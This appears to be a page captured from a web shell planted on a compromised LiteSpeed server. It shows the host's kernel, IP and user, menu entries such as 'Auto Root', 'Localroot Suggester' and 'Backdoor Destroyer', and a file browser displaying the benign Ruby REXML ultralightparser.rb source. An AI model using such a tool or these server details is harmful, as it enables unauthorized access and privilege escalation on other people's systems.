Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
lib64 /
ruby /
2.0.0 /
rexml /
parsers /
Delete
Unzip
Name
Size
Permission
Date
Action
baseparser.rb
19.52
KB
-rw-r--r--
2012-10-28 18:12
lightparser.rb
1.52
KB
-rw-r--r--
2011-05-19 05:37
pullparser.rb
5.08
KB
-rw-r--r--
2009-10-02 16:15
sax2parser.rb
8.58
KB
-rw-r--r--
2011-05-19 05:37
streamparser.rb
1.38
KB
-rw-r--r--
2009-10-02 16:15
treeparser.rb
3.48
KB
-rw-r--r--
2009-10-02 16:15
ultralightparser.rb
1.42
KB
-rw-r--r--
2011-05-19 05:37
xpathparser.rb
19.39
KB
-rw-r--r--
2011-06-11 12:35
Save
Rename
require 'rexml/parsers/streamparser' require 'rexml/parsers/baseparser' module REXML module Parsers class UltraLightParser def initialize stream @stream = stream @parser = REXML::Parsers::BaseParser.new( stream ) end def add_listener( listener ) @parser.add_listener( listener ) end def rewind @stream.rewind @parser.stream = @stream end def parse root = context = [] while true event = @parser.pull case event[0] when :end_document break when :end_doctype context = context[1] when :start_element, :doctype context << event event[1,0] = [context] context = event when :end_element context = context[1] else context << event end end root end end # An element is an array. The array contains: # 0 The parent element # 1 The tag name # 2 A hash of attributes # 3..-1 The child elements # An element is an array of size > 3 # Text is a String # PIs are [ :processing_instruction, target, data ] # Comments are [ :comment, data ] # DocTypes are DocType structs # The root is an array with XMLDecls, Text, DocType, Array, Text end end